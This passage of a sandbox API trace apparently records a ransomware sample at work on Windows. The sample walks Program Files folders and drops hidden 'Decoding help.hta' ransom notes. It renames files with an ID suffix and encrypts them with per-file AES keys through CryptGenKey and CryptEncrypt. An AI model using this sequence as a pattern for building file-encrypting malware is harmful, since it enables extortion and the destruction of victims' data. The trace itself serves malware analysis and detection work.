Files\\Microsoft Shared\\THEMES14\\BREEZE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*.*" [0053.630] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*.*") returned 70 [0053.630] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\Decoding help.hta" [0053.630] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\decoding help.hta")) returned 0xffffffff [0053.630] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8 [0055.306] WriteFile (in: hFile=0x3c8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x830fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x830fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.444] CloseHandle (hObject=0x3c8) returned 1 [0056.444] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.738] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BREEZE.ELM") returned 1 [0056.738] lstrlenW (lpString="BREEZE.ELM") returned 10 [0056.738] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*.*" [0056.738] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*.*") returned 70 [0056.738] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\", lpString2="BREEZE.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM" [0056.738] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM" [0056.738] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM.[ID]g9uZrLhJaygpwRm1[ID]" [0056.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.elm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.621] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.elm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0060.621] CreateFileMappingA (hFile=0x2f0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xd78 [0060.621] CryptAcquireContextA (in: phProv=0x830fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x830fcec*=0x10e289b0) returned 1 [0060.622] CryptGenKey (in: hProv=0x10e289b0, Algid=0x6610, dwFlags=0x1, phKey=0x830fce8 | out: phKey=0x830fce8*=0x10a4af28) returned 1 [0060.622] CryptExportKey (in: hKey=0x10a4af28, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x830fbe4, pdwDataLen=0x830fce4 | out: pbData=0x830fbe4*, pdwDataLen=0x830fce4*=0x2c) returned 1 [0060.622] MapViewOfFile (hFileMappingObject=0xd78, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a520) Thread: id = 591 os_tid = 0xd80 [0048.984] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*.*", lpFindFileData=0x844fd30 | out: lpFindFileData=0x844fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671c30 [0053.624] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0053.624] FindNextFileW (in: hFindFile=0x671c30, lpFindFileData=0x844fd30 | out: lpFindFileData=0x844fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51c2ab50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.624] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0053.624] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0053.624] FindNextFileW (in: hFindFile=0x671c30, lpFindFileData=0x844fd30 | out: lpFindFileData=0x844fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb876200, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51c2ab50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xeb876200, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xaec9, dwReserved0=0x0, dwReserved1=0x0, cFileName="CANYON.ELM", cAlternateFileName="")) returned 1 [0053.624] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*.*" [0053.624] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*.*") returned 70 [0053.624] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\Decoding help.hta" [0053.624] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\decoding help.hta")) returned 0xffffffff [0053.624] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b0 [0055.305] WriteFile (in: hFile=0x6b0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x844fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x844fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.441] CloseHandle (hObject=0x6b0) returned 1 [0056.441] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.735] lstrcmpiW (lpString1="Decoding help.hta", lpString2="CANYON.ELM") returned 1 [0056.735] lstrlenW (lpString="CANYON.ELM") returned 10 [0056.735] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*.*" [0056.735] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\*.*") returned 70 [0056.735] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\", lpString2="CANYON.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM" [0056.735] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM" [0056.736] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM.[ID]g9uZrLhJaygpwRm1[ID]" [0056.736] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.elm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.623] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\CANYON.ELM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\canyon.elm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x770 [0060.623] CreateFileMappingA (hFile=0x770, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3d8 [0060.623] CryptAcquireContextA (in: phProv=0x844fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x844fcec*=0x10e28ac0) returned 1 [0060.830] CryptGenKey (in: hProv=0x10e28ac0, Algid=0x6610, dwFlags=0x1, phKey=0x844fce8 | out: phKey=0x844fce8*=0x10a4b028) returned 1 [0060.830] CryptExportKey (in: hKey=0x10a4b028, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x844fbe4, pdwDataLen=0x844fce4 | out: pbData=0x844fbe4*, pdwDataLen=0x844fce4*=0x2c) returned 1 [0060.830] MapViewOfFile (hFileMappingObject=0x3d8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaec0) returned 0x39b0000 [0065.080] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x844fbe4*, pdwDataLen=0x844fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x844fbe4*, pdwDataLen=0x844fcf8*=0x100) returned 1 [0065.080] CryptEncrypt (hKey=0x10a4b028, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39b0000, pdwDataLen=0x844fce4*=0xaec0, dwBufLen=0xaec0) Thread: id = 592 os_tid = 0xd84 [0048.712] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\*.*", lpFindFileData=0x878fd30 | out: lpFindFileData=0x878fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52622770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x617be070, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x617be070, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8750 [0050.565] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0050.565] FindNextFileW (in: hFindFile=0x5d8750, lpFindFileData=0x878fd30 | out: lpFindFileData=0x878fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52622770, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x617be070, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x617be070, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.565] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0050.565] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0050.565] FindNextFileW (in: hFindFile=0x5d8750, lpFindFileData=0x878fd30 | out: lpFindFileData=0x878fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15fce800, ftCreationTime.dwHighDateTime=0x1c9e437, ftLastAccessTime.dwLowDateTime=0x60fb5630, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x15fce800, ftLastWriteTime.dwHighDateTime=0x1c9e437, nFileSizeHigh=0x0, nFileSizeLow=0x7600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb", cAlternateFileName="MICROS~2.TLB")) returned 1 [0050.565] lstrcpyW (in: lpString1=0x251f7c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\*.*" [0050.565] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\*.*") returned 69 [0050.565] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Decoding help.hta" [0050.565] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\decoding help.hta")) returned 0xffffffff [0050.565] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x718 [0051.682] WriteFile (in: hFile=0x718, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x878fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x878fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.702] CloseHandle (hObject=0x718) returned 1 [0053.677] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.427] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb") returned -1 [0058.427] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb") returned 56 [0058.428] lstrcmpiW (lpString1="[ID]", lpString2=".tlb") returned 1 [0058.428] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\*.*" [0058.428] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\*.*") returned 69 [0058.428] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\", lpString2="Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb" [0058.428] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb" [0058.428] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb.[ID]g9uZrLhJaygpwRm1[ID]" [0058.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.blueprints.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.blueprints.tlb.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.429] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\8.0\\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\8.0\\microsoft.visualstudio.tools.applications.blueprints.tlb.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc38 [0058.429] CreateFileMappingA (hFile=0xc38, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc3c [0058.429] CryptAcquireContextA (in: phProv=0x878fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x878fcec*=0x2aac62a8) returned 1 [0060.216] CryptGenKey (in: hProv=0x2aac62a8, Algid=0x6610, dwFlags=0x1, phKey=0x878fce8 | out: phKey=0x878fce8*=0x5fca7e0) returned 1 [0060.216] CryptExportKey (in: hKey=0x5fca7e0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x878fbe4, pdwDataLen=0x878fce4 | out: pbData=0x878fbe4*, pdwDataLen=0x878fce4*=0x2c) returned 1 [0060.216] MapViewOfFile (hFileMappingObject=0xc3c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7600) returned 0x4990000 Thread: id = 593 os_tid = 0xd88 [0048.714] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*.*", lpFindFileData=0x4b4fd30 | out: lpFindFileData=0x4b4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e29b0 [0048.715] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0048.715] FindNextFileW (in: hFindFile=0x5e29b0, lpFindFileData=0x4b4fd30 | out: lpFindFileData=0x4b4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0048.715] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0048.715] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0048.715] FindNextFileW (in: hFindFile=0x5e29b0, lpFindFileData=0x4b4fd30 | out: lpFindFileData=0x4b4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324d2e00, ftCreationTime.dwHighDateTime=0x1caca25, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x324d2e00, ftLastWriteTime.dwHighDateTime=0x1caca25, nFileSizeHigh=0x0, nFileSizeLow=0xe580, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSMAPI32.DLL", cAlternateFileName="")) returned 1 [0048.715] lstrcpyW (in: lpString1=0x10e25c90, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*.*" [0048.715] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*.*") returned 56 [0048.715] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\Decoding help.hta" [0048.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\decoding help.hta")) returned 0xffffffff [0048.715] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x260 [0050.383] WriteFile (in: hFile=0x260, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x4b4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x4b4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.535] CloseHandle (hObject=0x260) returned 1 [0053.666] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.618] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSMAPI32.DLL") returned -1 [0057.618] lstrlenW (lpString="MSMAPI32.DLL") returned 12 [0057.618] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*.*" [0057.618] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*.*") returned 56 [0057.618] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\", lpString2="MSMAPI32.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL" [0057.618] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL" | out: 